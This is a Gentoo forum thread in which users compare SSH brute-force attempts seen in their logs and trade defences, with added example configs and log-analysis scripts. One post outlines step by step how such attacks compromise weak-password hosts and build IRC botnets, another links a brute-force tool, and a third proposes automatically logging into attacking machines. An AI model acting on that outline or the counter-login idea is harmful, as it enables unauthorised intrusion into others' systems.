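The tcp-wrappers setup described above, written out as an added example (not rbr28's own files) with one change a practitioner usually needs: sshd stays reachable from a single trusted network, so the `ALL:ALL` deny does not lock you out. `192.0.2.0/255.255.255.0` is a placeholder for your own LAN; everything else is the page's own configuration.

```text
# /etc/hosts.allow  (consulted first; the first matching line grants access)
ALL  : 127.0.0.1
sshd : 192.0.2.0/255.255.255.0

# /etc/hosts.deny   (consulted only when nothing in hosts.allow matched)
ALL  : ALL
```

Two checks before trusting it: keep the session you are editing from open and confirm a fresh login from the trusted network still works and one from elsewhere is refused; and remember that only daemons linked against libwrap (or started through tcpd) consult these files at all. OpenSSH built with the tcpd USE flag does, but upstream OpenSSH removed libwrap support in version 6.7, so on a newer sshd the same restriction has to live in `sshd_config` (`AllowUsers`/`Match Address`) or in the firewall instead.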

----------

## gentoo_lan

They didn't hack into my smtp but they certainly tried to:

```
Dec 31 03:34:02 [postfix/smtpd] connect from unknown[221.140.55.113]
Dec 31 03:34:03 [postfix/smtpd] NOQUEUE: reject: RCPT from unknown[221.140.55.113]: 554 <smtphunter77@daum.net>: Relay access denied; from=<a0mnxyk9eakgbxq@yahoo.com.au> to=<smtphunter77@daum.net> proto=SMTP helo=<67.168.249.139>
Dec 31 03:34:03 [postfix/smtpd] lost connection after RCPT from unknown[221.140.55.113]
Dec 31 03:34:03 [postfix/smtpd] disconnect from unknown[221.140.55.113]
```

----------

## rinnan

 *Valhlalla wrote:*   

> My system is set up to email me any failed logins, but since I'm paranoid I'm going to check anyway 

 

Good thing I don't do that -- I would have gotten 107 e-mails for the last 3 days.  Better than spam!

----------

## appleboy

One thing that I would like to see created is a program that monitors logs and whenever failed attempts are made on programs like ssh, telnet, etc. it automatically finds the ISP and sends them an email with the log and some information. I think if the ISPs started getting tons of email from automated programs telling them their clients are hacked they would start doing some massive overhaul and go after their clients to clean up their computers. Heck, if their systems crashed from getting so much email, I think it would make them open an eye or two   :Twisted Evil: 

----------

## kill

 *appleboy wrote:*   

> One thing that I would like to see created is a program that monitors logs and whenever failed attempts are made on programs like ssh, telnet, etc. it automatically finds the ISP and sends them an email with the log and some information.

 

You should have read the entire thread.

 *hanj wrote:*   

> You should try incident.pl. It uses output from ACID and does a whois to retrieve abuse contacts of the offending IP. The format it needs is an mbox file, so if you're running with .maildir like me, you'll need another script that cats all the mails together prior to running incident.pl 
> 
> http://freshmeat.net/projects/incident.pl/

 

----------

## massheep

i got zero failed logins since i changed my sshd port from 22 to 59999  :Smile: 

to do so you need to edit  /etc/ssh/sshd_config and change the line

```
Port 22
```

 to 

```
Port 59999
```

(or to which port you like).

don't forget to adjust firewall if you got one.

----------

## jkt

 *appleboy wrote:*   

> One thing that I would like to see created  is a program that monitors logs

 

give "tenshi" a try. it's a project being developed by the gentoo team, originally used on gentoo core servers.

----------

## zephirus

Wow... I checked my messages file because of this thread, and now I am glad that I only allow ssh access with strict publickey auth. After all those failed attempts I ran chkrootkit anyway, and it seems I am fine.  :Smile: 

Of course, as I am ever curious about Info Security, does anyone have any resources that explain both how to accomplish, and how to protect from, SSH hacks? I would like to better understand both sides of the coin...

----------

## rex123

 *zephirus wrote:*   

> Of course, as I am ever curious about Info Security, does anyone have any resources that explain both how to accomplish, and how to protect from, SSH hacks? I would like to better understand both sides of the coin...

 

I can tell you how to accomplish this particular (most prevalent) 'hack':

1) search for machines listening on port 22

2) try to log on as test/test, root/root, john/john, etc (you can make up your own)

3) when you find a machine that allows you in, use it to find more similar machines until you get kicked off

4) install an irc bot on each machine that allows you to control the machine remotely via an undernet irc channel

5) also try to get root access via a few known local exploits, hoping that the administrator hasn't patched something or other. This isn't actually necessary, but it's kind of fun.

6) Once you've got your army of bots up to more than 1000 machines, you are the most 7337 h4X0r ever, and can retire.

To protect yourself from it, don't use your login name, or "password", or "test" etc as your password.

To protect yourself better, move your ssh port, don't run ssh, only allow certificate-based logins, use port knocking, restrict access by IP, or just turn your computer off :)

----------

## zephirus

 *rex123 wrote:*   

> use port knocking

 

Now that I want to learn... That looks very valuable... Any suggestions on reading material, tutorials, and/or how-tos on this??

----------

## mtamizi

 *Quote:*   

> Now that I want to learn... That looks very valuable... Any suggestions on reading material, tutorials, and/or how-tos on this??

 

Here's some fairly general tips on security.

Run Nessus on your computer for network security auditing to protect your computer.  Also try out `nmap` the port scanner.  Note: Nessus can be pointed at other people's computers to find vulnerabilities on remote hosts.

For reading material:

* Anything by the Honeynet project. http://project.honeynet.org/papers/index.html

* http://www.phrack.org/

* And for some more fun, although fictional, reading you should check out the "Stealing the Network" series.  Here is a sample chapter: http://www.insecure.org/stc/

Btw, you should always have at least one layer of NAT (Network Address Translation) on your network.  This can be done with any off the shelf router or a custom built PC router.

----------

## jkt

 *mtamizi wrote:*   

> Btw, you should always have at least one layer of NAT (Network Address Translation) on your network.

 

why? it's completely useless and only causing trouble, IMHO.

----------

## mtamizi

 *Quote:*   

> why? it's completely useless and only causing trouble

 

Not true -- it's very useful.  It prevents others from being able to directly address any computer on the network.  You can use port forwarding to gain remote access to services like ssh.  The whole point is to create only one point of entrance into the network.

You're right if there is only one computer on the network.  I should have stated I'm assuming there are at least two computers on the network.

----------

## krolden

 *rex123 wrote:*   

> 
> 
> To protect yourself from it, don't use your login name, or "password", or "test" etc as your password.
> 
> 

 

Or run a brute force tool against yourself.  Kinda like Randal Schwartz did.

----------

## jkt

 *mtamizi wrote:*   

>  *Quote:*   why? it's completely useless and only causing trouble 
> 
> Not true -- it's very useful.  It prevents others from being able to directly address any computer on the network.  You can use port forwarding to gain remote access to services like ssh.  The whole point is to create only one point of entrance into the network.
> 
> 

 

```
iptables -P INPUT DROP
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
```

and why to bother with NAT, if not needed?

 *Quote:*   

> 
> 
> You're right if there is only one computer on the network.  I should have stated I'm assuming there are at least two computers on the network.

 

if you have several computers and several IP addresses available, there's no point in doing NAT.

----------

## NightMonkey

 *jkt wrote:*   

>  *mtamizi wrote:*    *Quote:*   why? it's completely useless and only causing trouble 
> 
> Not true -- it's very useful.  It prevents others from being able to directly address any computer on the network.  You can use port forwarding to gain remote access to services like ssh.  The whole point is to create only one point of entrance into the network.
> 
>  
> ...

 

Even if you have one computer, I think it's useful for the "Lazy Admin". Using NAT and Port Forwarding on a dedicated network device (with very stripped down OS and services), you have a "default deny" setup, which even works for those guests running Windows or some other OS. In other words, it takes the OS of your clients out of the equation, and uses the IP network topology (Layer 3), rather than having to explicitly deny packets from the Internet as they arrive at your hosts' interface.

While I'm not saying that the "belt and suspenders" approach of having host-based security is not valuable, this can add a layer of security that can act in addition to host-based security. For instance, we have a local root exploit in our current Linux kernels. By using a Linksys device to perform NAT and port forwarding, I don't need to care so much, since that exploit doesn't exist for the Linksys box. It's true, I need to worry about my hosts running Linux, and eagerly await a patch, I don't have to worry about my network in general, until I see an exploit of the Linksys box.

Plus, hey, I like the web-based interface for configuring port forwardings *ducks*.  :Wink: 

----------

## jkt

 *NightMonkey wrote:*   

> Even if you have one computer, I think it's useful for the "Lazy Admin". Using NAT and Port Forwarding on a dedicated network device (with very stripped down OS and services), you have a "default deny" setup, which even works for those guests running Windows or some other OS. In other words, it takes the OS of your clients out of the equation, and uses the IP network topology (Layer 3), rather than having to explicitly deny packets from the Internet as they arrive at your hosts' interface.
> 
> 

 

please, don't talk about windows, we all know that firewalling them must be done on separate box.

to the NAT - I can't see any advantages of doing that. If you have only one public IP address, you don't have any other option, of course, but if you have multiple, why not to use them?

NAT is sometimes called "firewall for poor people" - yep, that's right. If you cannot setup your router (irrelevant if it runs linux, *bsd, IOS or it is some hw box) to do proper firewalling, you can use NAT. But why?

 *Quote:*   

> While I'm not saying that the "belt and suspenders" approach of having host-based security is not valuable, this can add a layer of security that can act in addition to host-based security.

 

Quite a common case is that your router is firewalling your private network. No need for NAT.

 *Quote:*   

> For instance, we have a local root exploit in our current Linux kernels. By using a Linksys device to perform NAT and port forwarding, I don't need to care so much, since that exploit doesn't exist for the Linksys box. It's true, I need to worry about my hosts running Linux, and eagerly await a patch, I don't have to worry about my network in general, until I see an exploit of the Linksys box.

 

Are you sure? You'd be quite surprised if you see how many of these boxes run linux, in fact...

And you aren't giving shell accounts on your routers/firewalls (and they don't run any services), are you? (exploit is local, not remote.)

 *Quote:*   

> Plus, hey, I like the web-based interface for configuring port forwardings *ducks*. 

 

If you insist on clicking everything, `emerge webmin`  :Smile: .

----------

## NightMonkey

Protecting your host against bad packets with iptables.... zero dollars

Seeing that the bad packets never ever get to your host in the first place.... priceless.

And, no, my linksys box isn't running Linux.

----------

## JeffW_

I just block SSH from all of China and Taiwan (http://www.404ster.com/sshblocks.php)... Brute force attacks have dropped to near nothing.  I disallow direct root access via ssh.  All users have strong passwords.  I don't have any problems.

----------

## bone

 *ill0gical wrote:*   

> I just block SSH from all of China and Taiwan (http://www.404ster.com/sshblocks.php)... Brute force attacks have dropped to near nothing.  I disallow direct root access via ssh.  All users have strong passwords.  I don't have any problems.

 

Where on earth did you get that list? Who compiled it? I just want to make sure, before I attempt to use it, that it's going to only do China & Taiwan (Not brazilian hackers and russian hackers beware).

jt

----------

## JeffW_

I got the majority of the list from http://china.blackholes.us/.  I ran it through a Perl script to compact the netblocks.  I also added in netblocks which ran SSH brute force attacks against my servers.  The list is updated as new attacks occur.  I have a Perl script that can update iptables automatically (listens on a single UDP port in the upper range).

----------

## Avernus-

^^ Haha blocking China

I actually blocked the whole China IP range (well as much as I thought I safely could) at work.  Stopped a lot of portscans, virus scripts, scripted hack attempts, etc.  It cut the daily size of the firewall logs in half.

Only problem is that this also blocked Australia and a few other countries that don't send out a mass of bad traffic.

----------

## JeffW_

Since when does Australia lease IP space from China?  Granted, their IP allocations are done through APNIC, but I'm not blocking APNIC (Japan, Hong Kong, China, Taiwan, Australia, etc...), I'm blocking China and Taiwan.

I have multiple people in Australia which use one of my servers and they've had no problems.

----------

## matador

I watched my messages log and boy did I get a hiccup there... They haven't compromised my system (since I use 16 char. passwords). I believe they might have been using this brute force utility based on the usernames: http://www.k-otik.com/exploits/08202004.brutessh2.c.php

I have already switched port but I think I will restrict the IP:s to Swedish ones.

----------

## MaxDamage

For monitoring port scans, psad just works well.

http://www.cipherdyne.com/psad/

----------

## thatguyiam

 *appleboy wrote:*   

> One thing that I would like to see created  is a program that monitors logs and whenever failed attempts are made on programs like ssh, telnet, etc. it automatically finds the ISP and sends them an email with the log and some information. I think if the ISPs started getting tons of email from automated programs telling them their client's are hacked they would start doing some massive overhaul and go after their clients to clean up their computers. heck, if they're systems crashed from getting so much email, I think it would make them open an eye or two  

 

... Until you mistype your own password and an e-mail is sent to your own ISP. JK

But in seriousness, brute forcing is annoying at best.  All this talk of port knocking and such--bah!  Change the port SSH runs on and don't have passwords the same as the username!  Simple.  

I've also noticed that these bots have been trying as many unique usernames as they can, like "micheal" and "nicole" and so forth.  Given that their IP is right in the log, it wouldn't be *that* hard to trace back to them, even if they went through a few hacked boxes.  

A more interesting thing to do would be to set up a script that tried to log into the box that's probing your server with the same username they're using on yours, then send an e-mail if it's successful.

Or, if you're bored like me, you can play a game called "guess why that box was hacked" in which a quick nmap shows you that 4 trojans are running on it  :Very Happy: 

----------

## jkt

 *thatguyiam wrote:*   

> A more interesting thing to do would be to set up a script that tried to log into the box that's probing your server with the same username they're using on yours, then send an e-mail if it's successful.

 

don't do it, you will probably run into troubles as it could be illegal.

----------

## thatguyiam

jkt --

You are correct.  Although it is a bit of a grey area, legally.  In the same way that in some areas, technically, it's illegal to fight back against someone physically beating you to a pulp.  It's not advisable to try to counterhack someone, especially since they might be doing it from an (innocent) rooted box.  One application of testing to see if the test:test works on an attacking computer is that if it does, it's probably a zombie box, and an e-mail sent to root@soandsoIP could alert them to their compromised box. But as it's been said many times, that's a lot more effort than it's worth to help someone who doesn't have the sense to not have easily guessed passwords like that.  I guess it's up to the user.

----------

## jkt

 *thatguyiam wrote:*   

> In the same way that in some areas, technically, it's illegal to fight back against someone physically beating you to a pulp.

 

OTW also here?  :Wink: 

I'm glad I don't live in such a country.

 *Quote:*   

> root@soandsoIP

 

it's useless, IMHO. if an administrator sets up such accounts, he probably doesn't read root's mail.

----------

## Enigma_Man

 *setagllib wrote:*   

> 
> 
> I very strongly recommend disabling every other kind of authentication. When you get an error authenticating, the auth methods in parentheses should only be 'publickey'.

 

I'm a noob, but trying to learn all of this. When I try to connect with a fake name, just to test this, I get:

```
(publickey,keyboard-interactive)
```

in the parentheses. What's keyboard-interactive? I didn't see any mention of that in the sshd_config.

Also... I have PAM enabled, and it allows me to log in with my username / password, even though I have plaintext passwords turned off. If I disable PAM, it just locks me out of the machine always. I'm trying to read the BSD info you posted, but it's a little above my head. Could you explain why at all?

Thanks,

-Jesse

----------

## jkt

 *Enigma_Man wrote:*   

> 
> 
> in the parenthesis. What's keyboard-interactive? I didn't see any mention of that in the sshd_config.

 

A method of authentication in which you supply a plaintext password.

 *Quote:*   

> 
> 
> Also... I have PAM enabled, and it allows me to log in with my username / password, even though I have plaintext passwords turned off.

 

look at files under /etc/pam.d/

----------

## tryze

hi all! i hope this question is ok in this thread, but i just installed root-tail and from time to time i get an odd message which doesn't tell me anything:

(user) /usr/sbin/cron[14433]: (root) CMD (test -x /usr/sbin/run-crons && /usr/sbin/run-crons )

does anyone know what this could be?

----------

## rex123

 *tryze wrote:*   

> [...]from time to time i get an odd message which doesn't tell me anything:
> 
> (user) /usr/sbin/cron[14433]: (root) CMD (test -x /usr/sbin/run-crons && /usr/sbin/run-crons )
> 
> does anyone know what this could be?

 

Yes. It's a cron job which makes the cron.daily, cron.hourly etc things work. Normally it runs every minute, and if you don't filter it out it fills up your log files.

Look in /etc/crontab. Most likely it looks something like this:

```
0  *  * * * root    rm -f /var/spool/cron/lastrun/cron.hourly
1  3  * * * root    rm -f /var/spool/cron/lastrun/cron.daily
15 4  * * 6 root    rm -f /var/spool/cron/lastrun/cron.weekly
30 5  1 * * root    rm -f /var/spool/cron/lastrun/cron.monthly
*  *  * * * root    test -x /usr/sbin/run-crons && /usr/sbin/run-crons
```

/usr/sbin/run-crons is a shell script - you can read it to get an idea what it does.

If you want to filter cron stuff from your logs, try something like this (syslog-ng):

```
source src { unix-stream("/dev/log"); internal(); pipe("/proc/kmsg"); };
filter nocron { not facility (cron); };
destination messages { file("/var/log/messages"); };
log { source(src); filter(nocron); destination(messages); };
```

----------

## tryze

ah, to know what it is makes me feel much better  :Wink: 

after appearing some time in a 10 min interval and some other messages (cron.daily and so on) i suspected something like this. I'm not that experienced with linux/gentoo yet, so i just asked...

thanks for the help!

----------

## rex123

 *tryze wrote:*   

> [...] thanks for the help!

 

No problem

----------

## sixshot

Okay, having peeked into my log twice, I'm starting to get very, if not absolutely, annoyed at the number of attempts.  I plan on using http://www.404ster.com/sshblocks.php for starting out.  But I'm wondering what http://www.blackholes.us/ is also used for, or what purpose it serves for us.  The page doesn't seem to give out much details on what it's for other than being a listing of IP address ranges.

Also, the thing I'd like to know most is whether or not I should block specifically SSH connections from those ranges or block entirely.  I ask this because I don't know where they lead to nor do I know if I, or someone in the family, happen to browse the web and stumble upon a website that coincidentally resolves to a blocked address.  What is the best course of action?

Just in case if it's necessary, I've the latest version of Apache2 running to serve personal webpage.  No telnet.  OpenSSH is the only method to interactively login to the router box.

----------

## cbock

this post should be required reading. i've had 6400+ failed logins since last july. wow. 

i felt better after reviewing 

```
grep -i "successful" /var/log/messages
```

not to say that's a true measure of successful security.  made me feel a little better though.

----------

## dasalvagg

i've seen rootkits discussed here....here are a couple pointers in combating them

1.  External filesystem.  ps, top, ls, netstat etc. commands are often modified by a rootkit.  Use the livecd or some other external known good filesystem to run chkrootkit.  Your system will appear clean if chkrootkit depends on files that have been modified.

2.  Turn off kernel modules.  When an attacker tries to install a rootkit they will often try a kernel level attack.  What happens is they modprobe a pre-built kernel module that will modify system calls to the kernel or filesystem that can hide their files.  Disabling kernel modules stops this.

3.  Prepare with hashes.  md5 your system using something like tripwire that will create a known good set of files.  If you suspect you've been hacked, compare the current md5s of your system with the previously made, good, md5s.  Of course these md5s should be stored externally.  An unmounted hard drive does NOT count as external.  

4.  Don't get hacked.  Seems obvious but it's the most important.  A firewall should not be your total security solution.  firewall + tripwire + nessus (to yourself) + hard passwords + ssh keys + chkrootkit regularly + checking syslogs + etc.  The more you prepare the less likely you'll ever need to post here and say "I've been hacked".
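A worked version of point 3, added here as an example and not code from the thread or from any poster: a baseline-and-verify pair built on sha256sum, with the compare step written so it can be run from a live CD as point 1 requires (hash the same relative paths from the mounted disk, so the known-good find, sha256sum and awk do the work). The paths in the usage comments are placeholders.

```sh
#!/bin/sh
# Added example, not code from the thread: a minimal tripwire-style baseline.
# Assumes GNU coreutils sha256sum(1). Keep the baseline file off the host
# (removable media, another machine): a hash list the intruder can rewrite
# proves nothing.
set -u

# Write "<sha256>  <path>" for every regular file below DIR..., sorted by
# path so two baselines can be compared line by line.
make_baseline() {
    # usage: make_baseline OUTFILE DIR...
    out=$1; shift
    find "$@" -type f -exec sha256sum {} + | sort -k2 > "$out"
}

# Rehash DIR... and compare against BASELINE. Prints one line per difference
# (ADDED, CHANGED or REMOVED <path>) and returns 1; returns 0 when identical.
verify_baseline() {
    # usage: verify_baseline BASELINE DIR...
    base=$1; shift
    cur=$(mktemp) || return 2
    make_baseline "$cur" "$@"
    diffs=$(awk '
        NR == FNR { old[$2] = $1; next }        # first file: the baseline
        {                                       # second file: current state
            if (!($2 in old))        print "ADDED " $2
            else if (old[$2] != $1)  print "CHANGED " $2
            seen[$2] = 1
        }
        END { for (p in old) if (!(p in seen)) print "REMOVED " p }
    ' "$base" "$cur" | sort)
    rm -f "$cur"
    [ -z "$diffs" ] && return 0
    printf '%s\n' "$diffs"
    return 1
}

# Typical use (placeholder paths). Relative paths keep the two lists
# comparable when the disk is later mounted somewhere else:
#   cd / && make_baseline /mnt/usb/baseline.sha256 bin sbin usr/bin usr/sbin lib
#   ... booted from a live CD, suspect root mounted on /mnt/disk ...
#   cd /mnt/disk && verify_baseline /mnt/usb/baseline.sha256 bin sbin usr/bin usr/sbin lib
```

Paths containing spaces break the awk field split; for the system directories this is meant for that is not an issue, and a real deployment should use tripwire or aide rather than this sketch.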

----------

## russianpirate

Does an inbound router and a firewall make it secure enough (no one can use the router's functions, but ping)... all ports are closed, no DMZ, no redirections. The only way the data is going in is if the firewall allows it (set up to allow on local in)... and if I'm requesting that data. My computer isn't accessible outside the LAN, only the router, and there's no way you can reconfigure it because there is no HTTP configuring set, only from LAN. I think you can safely skip the ssh, hard password (although I did set one that's pretty good lol), and everything else.

----------

## dasalvagg

There is a possibility still.  Security holes do occasionally, though not often, pop up for firewalls.  Rarely are they patched by home users that may have a Linksys hardware firewall.  They just don't know how.  If you were rooted in some other way, for instance you install a program that has a rootkit in it, then you're still hacked.  A firewall will not block the person from gaining access to the rooted system.  In this case the rootkit could "call home" or create a reverse shell where it would connect to the attacker's box and allow commands to be sent back to yours.  This works because the machine inside the firewall created the connection.  Security is best done in layers....apply as many as possible without denying features/ability to use the system.

----------

## rex123

Your computer is never secure. You can unplug it from the internet to improve security. You can even switch it off. But someone can break into your house, steal the hard drive, unencrypt the encrypted file system, and, finally, read your e-mail. Big deal. This is obvious Fear, Uncertainty, and Doubt.

It is important to protect against automated random attacks. It's wise to use reasonable, and reasonably usable, defensive mechanisms like firewalls. But it's daft to make your own life impossible by getting obsessed. Also, the more obsessed you are, the more of an interesting target you are for determined crackers. I would bet that security-related websites get more attacks than most others (apart from Microsoft of course).

----------

## /dev/random

 *dsegel wrote:*   

>  *braverock wrote:*   
> 
> I hope that someone will whip up a script to look for the 'illegal user xxx' strings in the log and respond with the appropriate iptables DROP command. 
> 
>   - Brian 
> ...

 

Has anyone written such a script yet? If so post here.

----------

## dasalvagg

Not exactly what you're asking about, but check out port knocking.  This technique allows you to modify your currently running firewall based upon "knocking."  The knocking daemon watches for a particular sequence of events, or knocks, on the firewall, then opens up a single port to the IP address that has performed the correct sequence.  This of course is useless for public servers that have lots of anonymous users; however, it is a potentially powerful way to disguise the existence of a server and provide more protection for critical services (i.e. sshd into your webserver).

----------

## /dev/random

Well I did read all 10 pages before posting so I've seen this mentioned before but this machine is my desktop and an http/ftp server so I don't want to trade off too much usability just for some security. So I was hoping I could figure out a way to sort of halt these hacking attempts without limiting everything else.

----------

## astrodelgato

I believe 

```
/etc/login.defs
```

 contains options to set the time between password attempts, max login attempts, etc.

I'm pretty sure that was asked about several times in this thread.

Someone please correct me if I am mistaken. 

Also, does this file affect SSH?

----------

## sinisterdomestik

 *cbock wrote:*   

> this post should be required reading. i've had 6400+ failed logins since last july. wow. 
> 
> i felt better after reviewing 
> 
> ```
> ...

 

and then i look at `grep -i "failed" /var/log/messages` and holy shit is there a lot of failed sshd attempts as root on all the ports above 60000. of course that was in September, and i don't remember what i was doing in September so it might have been me. thank god for 10+ character passwords  :Smile: 

----------

## cbock

the easiest fix for me was changing my ssh port to something other than 22....

----------

## Zuti

If you must have sshd running (and on a home (desktop) box I honestly dont see the reason why you should) you could use a tool called portknocking.

check it out at http://www.portknocking.org

----------

## mathgeek

I have a box with a fixed IP in my office. There are a lot of blunt ssh attempts in my logs, too. Thus, I reconfigured iptables so that access to port 22 is only granted from certain ranges of IP addresses. Since I am the only user on this machine and since I have a strong password, this does little more than stop my logs from bursting. But it works, though.

----------

## vert

Same here. But since I was interested in how often this occurs, I created a simple bash script that will email me at the end of the day if failed login attempts were detected during that day. It lists a summary of attempts per day (or ip). I get an email almost every day... For now my record stands at 400 attempts in one day! That was february 23, 2005. The most hits I had from one ip was 277 for 81.19.98.108.

Seeing the results, I quickly abandoned interactive logins and only use key files now. 

So yeah, it does seem there are a lot of compromised boxes out there  :Wink: 

----------

## WarMachine

Failed login attempts have completely ceased after I changed the config to listen on a much higher port number.

----------

## vert

Thought of that too, but I'm working a lot in different places behind various firewalls, and usually only the common ports are open.

----------

## Sysa

 *Determined wrote:*   

> Do you ssh this box from the internet? I hope there is a good reason to have open ports like that.
> 
> The moral of the story really: Strong passwords, hardware firewall, encrypt all network traffic possible.

 

"... hardware firewall ..." -  :Laughing:  . I do not think it saves you but you'll not see and control the situation!!

----------

## Veronika

Bcore,

thanks for bringing up this topic. I'm kind of what you have been until this happened to you: a trusting user and installer, not too much worried about hacking attempts aimed at my system... so thank you again for sharing your story. It makes me think I have to be more careful.

Best

 :Razz: 

----------

## simulacrum

You can count me in as a lazy admin with an old version of Awstats (6.2). The cracker was able to load multiple apps, the purpose of which I'm unsure, although one appears to be some kind of IRC bot. The really strange part was my server was fine for the two days since it was compromised. I was SSH'ed in this morning fiddling around as usual for me and I saw the offending process. When I killed it everything went south. Once I booted the LiveCD and looked at the filesystem I found that all the executables in /bin had been overwritten at about the time when I killed that process. It would seem that it was some kind of local root exploit waiting to go off.

I know I'm not the only one who's been rooted because of awstats, but I need to vent. I'm pretty bummed. I'm recompiling now and will soon have a fresh Gentoo install. Ironically, the intrusion happened the day after posting my screenshot in off the wall. I wonder if the script kiddies were looking for vulnerable machines on the Gentoo forums. Beware.

----------

## MrUlterior

Do you have a .tar of the rootkit or at least the names of the files the intruder uploaded? I'd be very interested having a squiff at that one.

----------

## Giorgio

me too...

thanks

----------

## Maedhros

Merged the previous three posts here.

----------

## djdunn

my openbsd gets beat on, on a daily basis, for this kind of stuff, for being an old machine.  It shrugs the repeated attacks off fine.  I don't worry about it.  Closing my firewall off completely to incoming ports and packets helps.  It's part of the times we live in.  It's better to adjust and accept that people will try than to make it so that you don't notice they are there.  I reinstall every 6 months to keep OpenBSD up to date, so log files aren't a big problem.  I'd rather them know that I'm here and they can't mess with me than to be invisible.

----------

## simulacrum

The intruder grabbed vulturu.tar.gz and unpacked an application called "raven". There were several other applications downloaded but I didn't bother saving them. I guess in retrospect that might have been the way to go. I'd be curious if anyone here was familiar with this vulturu/raven application.

----------

## killfire

 *ARC2300 wrote:*   

> Don't know about anyone else, but I do think that if you get hammered enough on these tries, it can crash your box, or at least drop it offline.  I've had my server up for 120 days, no problem.  This started, and my box crashes almost every 5 days until I changed ports.  And no, there aren't any strange directories or users, and netstat shows only my local IPs causing traffic.
> 
> http://home.insightbb.com/~arcruea/attempts.log << Lots of attempts on my IP from 5 log files.
> 
> I must say, though, that this is REALLY pissing me off.  I've emailed countless abuse@ISP addresses now, and finally gave up.  I should write a script, though, that does it for me.
> ...

 

my suggestion is get another box, as powerful as possible, and install openbsd on it, then set it up as a firewall.... 

if you can just drop all connections on port 22 except the ones you want (white list it kind of)

or if not, just shut down port 22 for a certain ip after 2 or 3 attempts.... that way, your firewall takes a beating, but who cares, openbsd is like a rock... and your actual computer is free of all but a few connections...

killfire

----------

## killfire

 */dev/random wrote:*   

> Well I did read all 10 pages before posting so I've seen this mentioned before but this machine is my desktop and an http/ftp server so I don't want to trade off too much usability just for some security. So I was hoping I could figure out a way to sort of halt these hacking attempts without limiting everything else.

 

if you dont even need ssh, then its simple:

get a dedicated firewall (openbsd is best, but most things will do), a cheap old box will do

and deny everything except port 80 and port 21... (my memory's terrible, 21 is ftp right?)

otherwise look into dynamically updating pf's rules, with something like snortsam...

killfire

----------

## rex123

I've just seen this excellent site: http://www.ranum.com/security/computer_security/papers/a1-firewall/

----------

## mekong

One question: Is there a worm active on the sshd port? I've got login attempts a few hundred times daily from dozens of IPs. Are these all hacked Linux boxes?

 :Crying or Very sad: 

----------

## Pacolov

 *Quote:*   

> 
> 
> Mar 23 15:11:50 [sshd] Did not receive identification string from 217.74.167.142
> 
> Mar 23 15:18:38 [sshd] Illegal user test from 217.74.167.142
> ...

 

Damn, I didn't even notice that stuff like this is going on at my server. luckily i keep it up to date and have secure logins only and use ssl where i can.

another spot: these fu**** steal bandwidth :o(

----------

## sam22

Following is a sample from my log.

This freak is trying with several login names. First common male, then female, then colors black, red,...

Fortunately none of the times he got access.

```
Mar 24 22:10:41 vlinsrv sshd[10528]: Illegal user jordan from 82.149.224.51
Mar 24 22:10:41 vlinsrv sshd(pam_unix)[10528]: check pass; user unknown
Mar 24 22:10:41 vlinsrv sshd(pam_unix)[10528]: authentication failure; logname= uid=0 euid=0 tty=NODEVssh ruser= rhost=ftp1.hg-computer.de
Mar 24 22:10:43 vlinsrv sshd[10528]: Failed password for illegal user jordan from 82.149.224.51 port 59084 ssh2
Mar 24 22:10:44 vlinsrv sshd[10530]: Illegal user michael from 82.149.224.51
Mar 24 22:10:45 vlinsrv sshd(pam_unix)[10530]: check pass; user unknown
Mar 24 22:10:45 vlinsrv sshd(pam_unix)[10530]: authentication failure; logname= uid=0 euid=0 tty=NODEVssh ruser= rhost=ftp1.hg-computer.de
Mar 24 22:10:47 vlinsrv sshd[10530]: Failed password for illegal user michael from 82.149.224.51 port 59230 ssh2
Mar 24 22:10:48 vlinsrv sshd[10532]: Illegal user nicole from 82.149.224.51
Mar 24 22:10:49 vlinsrv sshd(pam_unix)[10532]: check pass; user unknown
Mar 24 22:10:49 vlinsrv sshd(pam_unix)[10532]: authentication failure; logname= uid=0 euid=0 tty=NODEVssh ruser= rhost=ftp1.hg-computer.de
Mar 24 22:10:51 vlinsrv sshd[10532]: Failed password for illegal user nicole from 82.149.224.51 port 59371 ssh2
Mar 24 22:10:52 vlinsrv sshd[10534]: Illegal user daniel from 82.149.224.51
Mar 24 22:10:57 vlinsrv sshd(pam_unix)[10534]: check pass; user unknown
Mar 24 22:10:57 vlinsrv sshd(pam_unix)[10534]: authentication failure; logname= uid=0 euid=0 tty=NODEVssh ruser= rhost=ftp1.hg-computer.de
Mar 24 22:11:00 vlinsrv sshd[10534]: Failed password for illegal user daniel from 82.149.224.51 port 59513 ssh2
```

----------

## 59729

ssh displays the ip or the domain from the person trying to login right?

```
## drop all from xxx
iptables -A INPUT --source xxx.xxx.xxx.xxx -j DROP

### drop all from xxx on dport 22 (--dport needs a protocol match, hence -p tcp)
#iptables -A INPUT -p tcp --source xxx.xxx.xxx.xxx --dport 22 -j DROP
```
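The script /dev/random asked for, added here as an example and not code from the thread or from any poster: it counts failed sshd logins per source address from lines in the format of sam22's log, summarises them the way vert's daily mail does, and prints (never runs) the per-address DROP rules shown in the post above for addresses over a threshold. The sample log is constructed with documentation addresses; the rule it emits is the one above with `-p tcp --dport 22` added, which is required for a port match.

```sh
#!/bin/sh
# Added example, not code from the thread: summarise failed sshd logins per
# source address and print the iptables DROP lines for repeat offenders.
# Log format assumed: OpenSSH "Failed password ... from IP port N ssh2".
# Only that line is counted, so an attempt that also produced an
# "Illegal user" line is not counted twice.
set -u

# Constructed sample log (documentation addresses, not a real capture): one
# address working through the usual name list, one legitimate user who
# mistyped once and then logged in with a key.
SAMPLE_LOG='Mar 24 22:10:43 vlinsrv sshd[10528]: Failed password for illegal user jordan from 198.51.100.7 port 59084 ssh2
Mar 24 22:10:47 vlinsrv sshd[10530]: Failed password for illegal user michael from 198.51.100.7 port 59230 ssh2
Mar 24 22:10:51 vlinsrv sshd[10532]: Failed password for illegal user nicole from 198.51.100.7 port 59371 ssh2
Mar 24 22:11:00 vlinsrv sshd[10534]: Failed password for illegal user daniel from 198.51.100.7 port 59513 ssh2
Mar 24 23:02:12 vlinsrv sshd[10611]: Failed password for alice from 192.0.2.10 port 40122 ssh2
Mar 24 23:02:15 vlinsrv sshd[10612]: Accepted publickey for alice from 192.0.2.10 port 40123 ssh2'

# Read log lines on stdin; print "COUNT IP", busiest first. The address
# follows the word "from" whether or not "illegal user" precedes it, so the
# field is located rather than hard-coded.
attempts_per_ip() {
    awk '/sshd\[[0-9]+\]: Failed password for/ {
             for (i = 1; i <= NF; i++) if ($i == "from") { n[$(i + 1)]++; break }
         }
         END { for (ip in n) print n[ip], ip }' | sort -rn
}

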